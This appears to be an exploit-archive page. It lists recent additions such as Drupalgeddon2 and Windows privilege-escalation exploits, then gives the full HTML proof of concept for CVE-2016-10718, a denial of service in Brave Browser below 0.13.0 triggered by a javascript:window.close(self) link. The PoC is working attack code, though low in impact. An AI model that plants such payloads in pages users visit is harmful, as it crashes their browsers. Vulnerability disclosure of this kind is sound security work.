
12 changes to exploits/shellcodes Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017) Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039) D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
28 lines
No EOL
823 B
Text
28 lines
No EOL
823 B
Text
# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.
|
|
# Date: 2017-10-16
|
|
# Exploit Author: Sahil Tikoo
|
|
# Vendor Homepage: https://brave.com
|
|
# Software Link: https://github.com/brave/browser-laptop
|
|
# Version: 0.12.5
|
|
# Tested on: Kali Linux,Ubuntu ,Windows OS
|
|
# CVE : CVE-2016-10718
|
|
|
|
<html>
|
|
<title>Brave Window Object Remote Denial of Service.</title>
|
|
<head></head>
|
|
|
|
<body><br><br>
|
|
<h1><center>Brave Window Object Remote Denial of Service</center></h1><br><br>
|
|
<h2><center>Proof of Concept</center></br></br> </h2>
|
|
|
|
<center>
|
|
<b>Click the below link to Trigger the Vulnerability..</b><br><br>
|
|
<hr></hr>
|
|
|
|
<hr></hr>
|
|
<b><center><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></center>
|
|
|
|
</center>
|
|
</body>
|
|
|
|
</html> |